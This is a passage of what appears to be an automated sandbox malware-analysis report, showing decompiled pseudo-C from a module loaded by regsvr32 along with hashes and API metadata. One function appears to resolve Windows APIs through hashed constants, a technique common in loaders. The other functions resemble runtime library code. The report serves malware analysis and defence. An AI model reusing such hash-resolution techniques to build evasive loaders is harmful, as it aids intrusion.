                          				void* _t70;
                          				signed int _t78;
                          				long long _t89;
                          				signed int _t107;
                          				signed int _t108;
                          				void* _t111;
                          				void* _t114;
                          				long long* _t146;
                          				long long* _t149;
                          				intOrPtr* _t152;
                          				long long* _t153;
                          				signed long long _t158;
                          				intOrPtr _t183;
                          				intOrPtr* _t186;
                          				long long _t187;
                          				long long* _t188;
                          				long long* _t189;
                          				long long _t190;
                          				long long* _t192;
                          				void* _t196;
                          				void* _t203;
                          				void* _t205;
                          				long long* _t206;
                          				intOrPtr _t207;
                          				long long _t208;
                          
                          				_t205 = __r11;
                          				_t203 = __r9;
                          				_t196 = __r8;
                          				_t153 = __rbx;
                          				_t146 = __rax;
                          				_t114 = __esp;
                          				_t112 = __ebp;
                          				_t111 = __esi;
                          				_t107 = __edi;
                          				_a24 = __rbx;
                          				_a16 = __rdx;
                          				_t208 =  *0x3dd458;
                          				_t61 =  *((intOrPtr*)(__rcx + 0x50));
                          				_t187 =  *((intOrPtr*)(__rcx));
                          				r13d = r8d;
                          				_t190 = __rdx;
                          				_t188 = __rcx;
                          				_v72 = _t208;
                          				_v96 = _t187;
                          				_t206 = __rbx;
                          				if( *((intOrPtr*)(__rcx + 0x70)) >=  *((intOrPtr*)(__rcx + 0x50))) {
                          					_t61 = E003D47B8(0, __ecx, 0, __rax, __rbx, __rcx, __rdx);
                          				}
                          				_t158 =  *((intOrPtr*)(_t208 + 0x10));
                          				E003D908C(_t61, 0x4a75e5e7, _t158);
                          				if(_t146 != _t153) {
                          					_t9 = _t187 + 0x18; // 0x18
                          					_t158 = _t9;
                          					 *_t146();
                          				}
                          				_t88 =  *(_t188 + 0x70) & 0x000000ff;
                          				_t63 =  *(_t188 + 0x50) & 0x000000ff;
                          				if(( *(_t188 + 0x70) & 0x000000ff) >= _t63) {
                          					L16:
                          					_t64 = _a8;
                          				} else {
                          					_t107 = 0;
                          					_t186 =  *((intOrPtr*)( *((intOrPtr*)(_t188 + 0x48)) + _t158 * 8));
                          					_t152 = _t186;
                          					_t89 =  *_t186;
                          					if(_t89 == 0) {
                          						L9:
                          						_t146 = _t153;
                          					} else {
                          						while(_t89 != 0x2f) {
                          							_t146 = _t152 + 1;
                          							_t89 =  *_t146;
                          							if(_t89 != 0) {
                          								continue;
                          							}
                          							break;
                          						}
                          						if(_t89 == 0) {
                          							goto L9;
                          						}
                          					}
                          					if(_t146 != _t153 &&  *((char*)(_t146 - 1)) == 0x3a &&  *((char*)(_t146 + 1)) == 0x2f) {
                          						_t107 = _t63 - 0x4a75e5e7 + 2;
                          					}
                          					_t88 = _t107;
                          					_t64 = E003D240C(_t107, _t107, _t153, _t158 + _t186, _t186, _t187, _t188);
                          					_t206 = _t146;
                          					if(_t146 == _t153) {
                          						goto L16;
                          					} else {
                          						_t112 = 0;
                          						bpl = _t107 == 8;
                          						_a8 = 0;
                          						_t190 = _a16;
                          					}
                          				}
                          				E003D908C(_t64, 0x8d72aad2,  *((intOrPtr*)(_t208 + 0x10)));
                          				if(_t146 != _t153) {
                          					 *_t146();
                          				}
                          				if(_t206 == _t153) {
                          					_t108 = 8;
                          				} else {
                          					_t23 =  &_v104; // 0x2
                          					r9d = 0;
                          					r8d = r13d;
                          					_v112 = _t23;
                          					_t25 =  &_v88; // 0x12
                          					_t183 = _t190;
                          					_v120 = _t25;
                          					_t27 =  &_v80; // 0x1a
                          					_t149 = _t27;
                          					_v128 = _t149;
                          					_v136 = 0;
                          					_t67 = E003D5168(_t88, 0x8d72aad2, _t107, _t112, _t153, _t188, _t183, _t196, _t203, _t205);
                          					_t108 = _t67;
                          					if(_t67 == 0) {
                          						_t207 =  *0x3dd458;
                          						_t108 = 8;
                          						_t69 = E003D908C(_t67, 0x4a75e5e7,  *((intOrPtr*)(_t207 + 0x10)));
                          						if(_t149 != _t153) {
                          							_t69 =  *_t149();
                          						}
                          						_t163 =  *((intOrPtr*)(_t188 + 0x18));
                          						if( *((intOrPtr*)(_t188 + 0x18)) == _t153) {
                          							_t189 = _a8;
                          						} else {
                          							_t69 = E003D240C(_t88, _t108, _t153, _t163, _t183, _t187, _t188);
                          							_t189 = _t149;
                          						}
                          						_t70 = E003D908C(_t69, 0x8d72aad2,  *((intOrPtr*)(_t207 + 0x10)));
                          						if(_t149 != _t153) {
                          							_t70 =  *_t149();
                          						}
                          						if(_t189 != _t153) {
                          							_t73 = E003D908C(_t70, 0xfb849f8f,  *((intOrPtr*)(_t208 + 0x18)));
                          							if(_t149 == _t153) {
                          								r14d = 0;
                          							} else {
                          								r14d =  *_t149();
                          							}
                          							E003D908C(_t73, 0xfb849f8f,  *((intOrPtr*)(_v72 + 0x18)));
                          							if(_t149 == _t153) {
                          								r13d = 0;
                          							} else {
                          								r13d =  *_t149();
                          							}
                          							E003D240C(_t88, _t108, _t153, _t206, _t183, _t187, _t189);
                          							_t192 = _t149;
                          							if(_t149 != _t153) {
                          								_t41 = _t207 + 1; // 0x1
                          								r8d = _t41;
                          								 *((char*)(_t183 + _t149)) = 0x2f;
                          								L003D47B0();
                          								_v112 = _a8 != 0x00000000 | 0x00000002;
                          								_v120 = _a48;
                          								_v128 = _a40;
                          								_v136 = _v104;
                          								_t78 = E003D6518(_a8 != 0x00000000 | 0x00000002, r14d, _t108, _t111, 0xfb849f8f, _t114, _a40, _v96, _t192, _t187, _t189, _t192, _v80, _v88, _t205);
                          								_t108 = _t78;
                          								if(_t78 == 0x10d2) {
                          									asm("sbb eax, eax");
                          									_t108 = _t108 & _t78;
                          								}
                          								HeapFree();
                          							}
                          							HeapFree();
                          						}
                          						HeapFree();
                          						HeapFree(??, ??, ??);
                          					}
                          					HeapFree();
                          				}
                          				return _t108;
                          			}











































                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1bfc
                          0x003d1c01
                          0x003d1c15
                          0x003d1c1c
                          0x003d1c1f
                          0x003d1c28
                          0x003d1c2b
                          0x003d1c2e
                          0x003d1c31
                          0x003d1c36
                          0x003d1c3b
                          0x003d1c41
                          0x003d1c45
                          0x003d1c45
                          0x003d1c4a
                          0x003d1c53
                          0x003d1c5b
                          0x003d1c5d
                          0x003d1c5d
                          0x003d1c61
                          0x003d1c61
                          0x003d1c63
                          0x003d1c67
                          0x003d1c6d
                          0x003d1cdd
                          0x003d1cdd
                          0x003d1c6f
                          0x003d1c73
                          0x003d1c75
                          0x003d1c79
                          0x003d1c7c
                          0x003d1c80
                          0x003d1c94
                          0x003d1c94
                          0x003d1c82
                          0x003d1c82
                          0x003d1c87
                          0x003d1c8a
                          0x003d1c8e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x003d1c8e
                          0x003d1c92
                          0x00000000
                          0x00000000
                          0x003d1c92
                          0x003d1c9a
                          0x003d1cac
                          0x003d1cac
                          0x003d1caf
                          0x003d1cb6
                          0x003d1cbb
                          0x003d1cc1
                          0x00000000
                          0x003d1cc3
                          0x003d1cc3
                          0x003d1cc8
                          0x003d1ccc
                          0x003d1cd3
                          0x003d1cd3
                          0x003d1cc1
                          0x003d1cf4
                          0x003d1cfc
                          0x003d1d07
                          0x003d1d07
                          0x003d1d0c
                          0x003d1ed1
                          0x003d1d12
                          0x003d1d12
                          0x003d1d17
                          0x003d1d1a
                          0x003d1d1d
                          0x003d1d22
                          0x003d1d27
                          0x003d1d2a
                          0x003d1d2f
                          0x003d1d2f
                          0x003d1d37
                          0x003d1d3c
                          0x003d1d40
                          0x003d1d45
                          0x003d1d49
                          0x003d1d4f
                          0x003d1d62
                          0x003d1d67
                          0x003d1d6f
                          0x003d1d75
                          0x003d1d75
                          0x003d1d77
                          0x003d1d7e
                          0x003d1d8c
                          0x003d1d80
                          0x003d1d82
                          0x003d1d87
                          0x003d1d87
                          0x003d1d9d
                          0x003d1da5
                          0x003d1dab
                          0x003d1dab
                          0x003d1db0
                          0x003d1dc1
                          0x003d1dc9
                          0x003d1dd5
                          0x003d1dcb
                          0x003d1dd0
                          0x003d1dd0
                          0x003d1de3
                          0x003d1deb
                          0x003d1df7
                          0x003d1ded
                          0x003d1df2
                          0x003d1df2
                          0x003d1e02
                          0x003d1e07
                          0x003d1e0d
                          0x003d1e16
                          0x003d1e16
                          0x003d1e1f
                          0x003d1e26
                          0x003d1e52
                          0x003d1e5e
                          0x003d1e67
                          0x003d1e6c
                          0x003d1e70
                          0x003d1e75
                          0x003d1e7c
                          0x003d1e81
                          0x003d1e83
                          0x003d1e83
                          0x003d1e8d
                          0x003d1e8d
                          0x003d1e9b
                          0x003d1e9b
                          0x003d1eab
                          0x003d1ebb
                          0x003d1ebb
                          0x003d1ec9
                          0x003d1ec9
                          0x003d1eef

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: FreeHeap$ErrorLast
                          • String ID: uJ$uJ
                          • API String ID: 2332451156-3171342107
                          • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction ID: c54a66dddbdd2c3a78b24631ffafa1f59fe00569c712fa0c88545dfe8a2f36ba
                          • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                          • Instruction Fuzzy Hash: B771AE27714B8097CB22EF66F45036AA7A6F7C9B84F598823EE8E47B15DE38C545C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction ID: 5336fff0df82499d9a2f93a7083c9e98d747d60019dfe1a9d206dba996919bf7
                          • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                          • Instruction Fuzzy Hash: EEF06261B19B42A2EF888B21F4943796760FF89BD0F481039D91F46668DF3CEC98C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E00007FF87FF88C084AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
                          				char _v64;
                          				signed long long _v72;
                          				intOrPtr _v84;
                          				unsigned int _v88;
                          				intOrPtr _v96;
                          				long long _v100;
                          				signed int _v104;
                          				signed int _v120;
                          				void* __rbp;
                          				void* _t75;
                          				long _t94;
                          				unsigned int _t95;
                          				intOrPtr _t103;
                          				signed int _t124;
                          				intOrPtr _t158;
                          				unsigned long long _t164;
                          				signed int* _t166;
                          				intOrPtr _t169;
                          				unsigned int _t182;
                          				signed short* _t183;
                          				void* _t185;
                          				signed long long _t194;
                          				void* _t195;
                          				signed long long _t197;
                          				signed long long _t198;
                          				signed long long _t200;
                          				void* _t201;
                          				signed short* _t202;
                          
                          				_t192 = __r9;
                          				_t179 = __rdx;
                          				_t167 = __rbx;
                          				_a32 = __rbx;
                          				r15d = r8d;
                          				_t194 = __ecx;
                          				_t183 = __rdx;
                          				if (r8d != 0) goto 0x8c084b26;
                          				goto 0x8c084dc1;
                          				if (__rdx != 0) goto 0x8c084b4a;
                          				E00007FF87FF88C07E680(__rax);
                          				 *__rax = 0;
                          				_t75 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t75);
                          				goto 0x8c084dc1;
                          				r14d = r14d & 0x0000003f;
                          				_t197 = _t194 >> 6;
                          				_t200 = _t194 << 6;
                          				_v72 = _t197;
                          				_t169 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
                          				if (__rbx - 1 - 1 > 0) goto 0x8c084b80;
                          				if (( !r15d & 0x00000001) == 0) goto 0x8c084b2b;
                          				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x8c084b96;
                          				_t14 = _t179 + 2; // 0x2
                          				r8d = _t14;
                          				E00007FF87FF88C085D68(0x8c0b4970, _t169, __rdx);
                          				_v88 = _t182;
                          				if (E00007FF87FF88C083EE4(r12d, 0, 0x8c0b4970) == 0) goto 0x8c084cab;
                          				_t158 =  *((intOrPtr*)(0x8c0b4970 + _t197 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084cab;
                          				E00007FF87FF88C07F0D4(_t158, __rbx, _t169, _t179, __r9);
                          				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x8c084bec;
                          				if ( *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x8c084cab;
                          				if (GetConsoleMode(??, ??) == 0) goto 0x8c084cab;
                          				if (_t103 == 0) goto 0x8c084c8d;
                          				if (_t103 - 1 - 1 > 0) goto 0x8c084d48;
                          				_v104 = _v104 & 0;
                          				_t195 = _t183 + _t201;
                          				_t202 = _t183;
                          				_v100 = 0;
                          				if (_t183 - _t195 >= 0) goto 0x8c084d3e;
                          				r13d =  *_t202 & 0x0000ffff;
                          				if (E00007FF87FF88C08633C(r13w & 0xffffffff) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if (r13w != 0xa) goto 0x8c084c70;
                          				r13d = 0xd;
                          				if (E00007FF87FF88C08633C(r13d) != r13w) goto 0x8c084c7b;
                          				_v100 = 2;
                          				if ( &(_t202[1]) - _t195 >= 0) goto 0x8c084c84;
                          				goto 0x8c084c35;
                          				_v104 = GetLastError();
                          				_t198 = _v72;
                          				goto 0x8c084d3e;
                          				r9d = r15d;
                          				E00007FF87FF88C08446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
                          				asm("movsd xmm0, [eax]");
                          				_t124 =  *0x7FF88C0B4978;
                          				goto 0x8c084d43;
                          				if (( *( *((intOrPtr*)(0x8c0b4970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x8c084d0b;
                          				if (3 == 0) goto 0x8c084cf7;
                          				if (3 == 0) goto 0x8c084ce3;
                          				if (2 != 1) goto 0x8c084d48;
                          				r9d = r15d;
                          				E00007FF87FF88C08477C(3, r12d, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084898(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				r9d = r15d;
                          				E00007FF87FF88C084674(r12d, _t124, 0x8c0b4970, _t167,  &_v104, _t185, _t183);
                          				goto 0x8c084c9f;
                          				_v104 = _v104 & _t124;
                          				_v120 = _v120 & 0x8c0b4970;
                          				r8d = r15d;
                          				_v100 = 0x8c0b4970;
                          				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8c084d3b;
                          				_t94 = GetLastError();
                          				_v104 = _t94;
                          				asm("movsd xmm0, [ebp-0x30]");
                          				asm("movsd [ebp-0x20], xmm0");
                          				_t164 = _v88 >> 0x20;
                          				if (_t94 != 0) goto 0x8c084dbc;
                          				_t95 = _v88;
                          				if (_t95 == 0) goto 0x8c084d88;
                          				if (_t95 != 5) goto 0x8c084d7b;
                          				E00007FF87FF88C07E6A0(_t164);
                          				 *_t164 = 9;
                          				E00007FF87FF88C07E680(_t164);
                          				 *_t164 = 5;
                          				goto 0x8c084b42;
                          				E00007FF87FF88C07E630(_v88, _t164, _t167);
                          				goto 0x8c084b42;
                          				_t166 =  *((intOrPtr*)(0x8c0b4970 + _t198 * 8));
                          				if (( *(0x8c0b4970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x8c084da4;
                          				if ( *_t183 == 0x1a) goto 0x8c084b1f;
                          				E00007FF87FF88C07E6A0(_t166);
                          				 *0x8c0b4970 = 0x1c;
                          				E00007FF87FF88C07E680(_t166);
                          				 *_t166 =  *_t166 & 0x00000000;
                          				goto 0x8c084b42;
                          				return _v84 - _v96;
                          			}































                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084af8
                          0x7ff88c084b11
                          0x7ff88c084b14
                          0x7ff88c084b17
                          0x7ff88c084b1d
                          0x7ff88c084b21
                          0x7ff88c084b29
                          0x7ff88c084b2b
                          0x7ff88c084b30
                          0x7ff88c084b32
                          0x7ff88c084b37
                          0x7ff88c084b3d
                          0x7ff88c084b45
                          0x7ff88c084b54
                          0x7ff88c084b5b
                          0x7ff88c084b5f
                          0x7ff88c084b63
                          0x7ff88c084b67
                          0x7ff88c084b6b
                          0x7ff88c084b75
                          0x7ff88c084b7e
                          0x7ff88c084b86
                          0x7ff88c084b8d
                          0x7ff88c084b8d
                          0x7ff88c084b91
                          0x7ff88c084b99
                          0x7ff88c084ba4
                          0x7ff88c084bb1
                          0x7ff88c084bbb
                          0x7ff88c084bc1
                          0x7ff88c084bd4
                          0x7ff88c084be6
                          0x7ff88c084c08
                          0x7ff88c084c10
                          0x7ff88c084c17
                          0x7ff88c084c1d
                          0x7ff88c084c20
                          0x7ff88c084c26
                          0x7ff88c084c29
                          0x7ff88c084c2f
                          0x7ff88c084c35
                          0x7ff88c084c46
                          0x7ff88c084c4b
                          0x7ff88c084c53
                          0x7ff88c084c55
                          0x7ff88c084c67
                          0x7ff88c084c6b
                          0x7ff88c084c77
                          0x7ff88c084c79
                          0x7ff88c084c81
                          0x7ff88c084c84
                          0x7ff88c084c88
                          0x7ff88c084c8d
                          0x7ff88c084c9a
                          0x7ff88c084c9f
                          0x7ff88c084ca3
                          0x7ff88c084ca6
                          0x7ff88c084cbc
                          0x7ff88c084cc3
                          0x7ff88c084cc8
                          0x7ff88c084ccd
                          0x7ff88c084ccf
                          0x7ff88c084cdc
                          0x7ff88c084ce1
                          0x7ff88c084ce3
                          0x7ff88c084cf0
                          0x7ff88c084cf5
                          0x7ff88c084cf7
                          0x7ff88c084d04
                          0x7ff88c084d09
                          0x7ff88c084d14
                          0x7ff88c084d19
                          0x7ff88c084d1e
                          0x7ff88c084d24
                          0x7ff88c084d30
                          0x7ff88c084d32
                          0x7ff88c084d38
                          0x7ff88c084d3e
                          0x7ff88c084d43
                          0x7ff88c084d4c
                          0x7ff88c084d52
                          0x7ff88c084d54
                          0x7ff88c084d59
                          0x7ff88c084d5e
                          0x7ff88c084d60
                          0x7ff88c084d65
                          0x7ff88c084d6b
                          0x7ff88c084d70
                          0x7ff88c084d76
                          0x7ff88c084d7e
                          0x7ff88c084d83
                          0x7ff88c084d8f
                          0x7ff88c084d99
                          0x7ff88c084d9e
                          0x7ff88c084da4
                          0x7ff88c084da9
                          0x7ff88c084daf
                          0x7ff88c084db4
                          0x7ff88c084db7
                          0x7ff88c084dd8

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction ID: eef463dae4ee02106e8aeaa2528a0663b53b2f1ec4ff8a3be00073a9f06ac156
                          • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                          • Instruction Fuzzy Hash: AA81A122E1861289FF609BA6D8606BD2BE4FB56BC8F418135DE0E1B799DF3CA445C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 20%
                          			E00007FF87FF88C08446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
                          				signed long long _v72;
                          				char _v80;
                          				intOrPtr _v87;
                          				char _v88;
                          				long long _v96;
                          				long long _v104;
                          				int _v108;
                          				intOrPtr _v112;
                          				short _v116;
                          				char _v120;
                          				signed long long _v128;
                          				signed long long _v136;
                          				intOrPtr _v144;
                          				signed int _v152;
                          				int _t80;
                          				long _t85;
                          				signed char _t86;
                          				signed long long _t116;
                          				intOrPtr _t120;
                          				long* _t125;
                          				signed long long _t127;
                          				intOrPtr _t136;
                          				signed long long _t140;
                          				void* _t143;
                          				signed long long _t146;
                          				void* _t148;
                          				void* _t156;
                          				void* _t157;
                          				signed long long _t161;
                          
                          				_t127 = __rcx;
                          				_a8 = __rbx;
                          				_t116 =  *0x8c0b3760; // 0x91a6ae42c18b
                          				_v72 = _t116 ^ _t148 - 0x00000080;
                          				r12d = r9d;
                          				_t161 = __edx >> 6;
                          				_t146 = __edx << 6;
                          				_v96 = __r8;
                          				_t125 = __rcx;
                          				_t157 = _t156 + __r8;
                          				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x28));
                          				_v104 = 0x8c0b4970;
                          				_v108 = GetConsoleCP();
                          				 *__rcx = __rdx;
                          				 *((intOrPtr*)(__rcx + 8)) = 0;
                          				if (__r8 - _t157 >= 0) goto 0x8c08464a;
                          				r13b =  *((intOrPtr*)(__r8));
                          				_v120 = 0;
                          				_t136 =  *((intOrPtr*)(0x8c0b4970 + _t161 * 8));
                          				_t86 =  *(_t136 + _t146 + 0x3d);
                          				if ((_t86 & 0x00000004) == 0) goto 0x8c08451f;
                          				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
                          				r8d = 2;
                          				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
                          				_v87 = r13b;
                          				goto 0x8c084564;
                          				E00007FF87FF88C081740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
                          				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x8c08455b;
                          				if (__r8 - _t157 >= 0) goto 0x8c08462a;
                          				r8d = 2;
                          				if (E00007FF87FF88C081654( &_v120, __r8) == 0xffffffff) goto 0x8c08464a;
                          				_t143 = __r8 + 1;
                          				goto 0x8c084576;
                          				r8d = 1;
                          				if (E00007FF87FF88C081654( &_v120, _t143) == 0xffffffff) goto 0x8c08464a;
                          				_v128 = _v128 & 0x00000000;
                          				_v136 = _v136 & 0x00000000;
                          				r9d = 1;
                          				_v144 = 5;
                          				_v152 =  &_v80;
                          				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                          				r14d = _t80;
                          				if (_t80 == 0) goto 0x8c08464a;
                          				_v152 = _v152 & 0x00000000;
                          				_t140 =  &_v80;
                          				r8d = _t80;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				_t125[1] = _t125[2] - _v96 + __edi;
                          				if (_v112 - r14d < 0) goto 0x8c08464a;
                          				if (r13b != 0xa) goto 0x8c084622;
                          				_t50 = _t140 + 0xd; // 0xd
                          				_v152 = _t140;
                          				_t52 = _t140 + 1; // 0x1
                          				r8d = _t52;
                          				_v116 = _t50;
                          				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8c084642;
                          				if (_v112 - 1 < 0) goto 0x8c08464a;
                          				_t125[2] = _t125[2] + 1;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c0844e0;
                          				 *((char*)( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
                          				 *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x8c0b4970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
                          				_t125[1] = _t125[1] + 1;
                          				goto 0x8c08464a;
                          				_t85 = GetLastError();
                          				 *_t125 = _t85;
                          				E00007FF87FF88C086D80();
                          				return _t85;
                          			}
































                          0x7ff88c08446c
                          0x7ff88c08446c
                          0x7ff88c084486
                          0x7ff88c084490
                          0x7ff88c0844a1
                          0x7ff88c0844a4
                          0x7ff88c0844ab
                          0x7ff88c0844b2
                          0x7ff88c0844b6
                          0x7ff88c0844b9
                          0x7ff88c0844c0
                          0x7ff88c0844c5
                          0x7ff88c0844d1
                          0x7ff88c0844d4
                          0x7ff88c0844da
                          0x7ff88c0844e0
                          0x7ff88c0844e6
                          0x7ff88c0844f0
                          0x7ff88c0844f4
                          0x7ff88c0844f8
                          0x7ff88c0844ff
                          0x7ff88c084508
                          0x7ff88c08450c
                          0x7ff88c084516
                          0x7ff88c084519
                          0x7ff88c08451d
                          0x7ff88c08451f
                          0x7ff88c084530
                          0x7ff88c084535
                          0x7ff88c08453b
                          0x7ff88c084550
                          0x7ff88c084556
                          0x7ff88c084559
                          0x7ff88c08455b
                          0x7ff88c084570
                          0x7ff88c084576
                          0x7ff88c084580
                          0x7ff88c08458d
                          0x7ff88c084593
                          0x7ff88c08459d
                          0x7ff88c0845a5
                          0x7ff88c0845ab
                          0x7ff88c0845b0
                          0x7ff88c0845be
                          0x7ff88c0845c4
                          0x7ff88c0845c8
                          0x7ff88c0845d5
                          0x7ff88c0845df
                          0x7ff88c0845e6
                          0x7ff88c0845ec
                          0x7ff88c0845f2
                          0x7ff88c0845f5
                          0x7ff88c0845fa
                          0x7ff88c0845fa
                          0x7ff88c084602
                          0x7ff88c084614
                          0x7ff88c08461a
                          0x7ff88c08461c
                          0x7ff88c08461f
                          0x7ff88c084625
                          0x7ff88c084630
                          0x7ff88c084638
                          0x7ff88c08463d
                          0x7ff88c084640
                          0x7ff88c084642
                          0x7ff88c084648
                          0x7ff88c084654
                          0x7ff88c084673

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                          • String ID:
                          • API String ID: 3659116390-0
                          • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction ID: d7f5fce0a63d2527628e5392eeff169cbf11d43a884e3325905144419ad754b0
                          • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                          • Instruction Fuzzy Hash: 6151CF32A18A5189EB20CF66E8543AC3BB4FB46BD8F048135CE4A4BB9DDF38D556C704
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 36%
                          			E00007FF87FF88C07F320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
                          				signed long long _t72;
                          				signed long long _t76;
                          				intOrPtr _t78;
                          				signed long long _t80;
                          				signed long long _t89;
                          				struct HINSTANCE__* _t94;
                          				signed long long _t95;
                          				long long _t101;
                          				void* _t105;
                          				signed long long _t109;
                          				signed long long _t111;
                          				signed long long _t114;
                          				struct HINSTANCE__* _t115;
                          				long _t118;
                          				void* _t121;
